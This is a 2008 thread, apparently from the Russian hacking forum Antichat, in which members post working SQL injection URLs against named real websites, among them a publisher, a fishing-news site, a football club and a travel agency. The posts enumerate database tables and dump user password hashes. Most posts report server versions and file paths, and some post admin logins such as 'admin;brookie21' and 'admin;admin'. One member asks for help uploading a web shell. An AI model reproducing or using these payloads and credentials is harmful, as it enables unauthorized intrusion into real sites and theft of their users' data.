Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
26.08.2008, 21:13
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
sabe, можеш пояснить, вот это "unhex(hex" ? 
для чего это нужно?
и откуда ты получил вот эту таблицу?
" member_login_key"
Последний раз редактировалось SeNaP; 26.08.2008 в 21:40..
|
|
|
26.08.2008, 22:01
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
SeNaP
hex() - это конвертация стринга в хекс..
unhex() - обратная функция...
используем эту конструкцию вместе чтобы не было таких ошибок как у тебя 
member_login_key - это стандартное поле где хранятся пассы от IPB
Последний раз редактировалось sabe; 26.08.2008 в 23:11..
|
|
|
|
26.08.2008, 23:24
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540
Репутация:
96
|
|
Все читают книжки? xD
Издательство "Эксмо"
http://www.eksmo.ru/catalog/book?b=1'
http://www.eksmo.ru/catalog/book?b=61308+union+select+1,2,3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5/*
4.0.21-standard-log
Издательство "Народное"
http://literati.ru/list4.php?rub=1'
http://literati.ru/list4.php?rub=-1+union+select+1,2,3,4/*
4.1.22-log
Последний раз редактировалось $p01nt; 26.08.2008 в 23:27..
|
|
|
|
Мой нормальный SQL-inJ =) |
27.08.2008, 00:02
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Мой нормальный SQL-inJ =)
А теперь после книжек идем на рыбалку 
--------------
Базы ДанныХ
http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,table_name,3+from+INFORMATION_SC HEMA.TABLES&limit=0
--------------
Таблицы в форуме
http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,column_name,3+from+INFORMATION_S CHEMA.COLUMNS+where+table_name='phpbb_users'&limit =0
---------------
Юзеры форума
КЕШ(пароль не расшифрованный) = ЛОГИН
http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,(concat_ws(0x3d,user_password,us ername)),3+from+phpbb_users&limit=0
----------------
Форум _http://www.flyfishinginnh.com/forum/
логин:admin
Пароль: 1 или brookie21
так как я по английскому не хрена не шарю
пороль 1 или brookie21
Логин: admin
-----------------
Кто сможет залить шел, отпишитесь пожалуйчто в ЛС |
|
|
|
27.08.2008, 00:51
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
SeNaP
admin;brookie21
но форум не тот что ты указал это булка. у тебя хеш от phpbb ищи phpbb дам шелл нету phpbb ищи в базе поля от vb +))))))))
|
|
|
|
27.08.2008, 03:11
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Давайте посетим сайт футбольного клуба Анжи.
http://www.fc-anji.ru
Код:
http://www.fc-anji.ru/news.php?id=-341+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6/*
version() - 4.1.22
user() - opendag@localhost
database() - wwwopendagru
Раскрытие пути:
/www/opendag/users/opendag-fcanji/www/htdocs/news.php
К information_schema и mysql.user доступа нету( |
|
|
|
27.08.2008, 03:14
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
Сообщение от USAkid
Давайте посетим сайт футбольного клуба Анжи.
http://www.fc-anji.ru
Код:
http://www.fc-anji.ru/news.php?id=-341+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6/*
version() - 4.1.22
user() - opendag@localhost
database() - wwwopendagru
Раскрытие пути:
/www/opendag/users/opendag-fcanji/www/htdocs/news.php
К information_schema и mysql.user доступа нету( конечно к information_schema доступа не будет.. этож 4 версия.. там его просто нет=)
|
|
|
|
27.08.2008, 07:41
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
http://www.nord-east.ru/index.php?id=-1111+union+select+1,table_name,3,4+from+informatio n_schema.tables+limit+0,1--
Строительная компания какая-то -)
только в табличках нифига толкового нету.
|
|
|
|
27.08.2008, 09:02
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Турфирма Эл ь ф-СПб
http://www.bustur.ru
Код:
http://www.bustur.ru/t.php?id=-1+union+select+1,2,3,concat_ws(version(),0x3a,user(),0x3a,database())--
version() - 5.1.19-beta
user() - petrotour@localhost
database() - petrotour
Есть контакт! Пошли таблички:
Код:
http://www.bustur.ru/t.php?id=-1+union+select+1,2,3,table_name+from+information_schema.tables--
----------------------------------------------------------------
http://santechmart.ru
Код:
http://santechmart.ru/print.php?id=-1+union+select+concat_ws(version(),0x3a,user(),0x3a,database())--
version() - 5.0.41-log
user() - santechmartru@troy.mplik.ru
database() - santechmartru
Табличке:
Код:
http://santechmart.ru/print.php?id=-1+union+select+table_name+from+information_schema.tables+limit+1,1--
Перебирать по: 2,1 ; 3,1 ; 4,1 и т.д.
Последний раз редактировалось USAkid; 27.08.2008 в 09:23..
|
|
|
|
27.08.2008, 11:10
|
|
Banned
Регистрация: 23.02.2008
Сообщений: 268
Провел на форуме:
3103600
Репутация:
850
|
|
http://www.pc-olymp.ru/gymnastik/index.php3?page=-1+union+select+concat(login,0x3a3a,pwd),2,3,4+from %20+users+limit+0,10/*
админка http://www.pc-olymp.ru/admin/
пароль и пасс
admin;admin
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
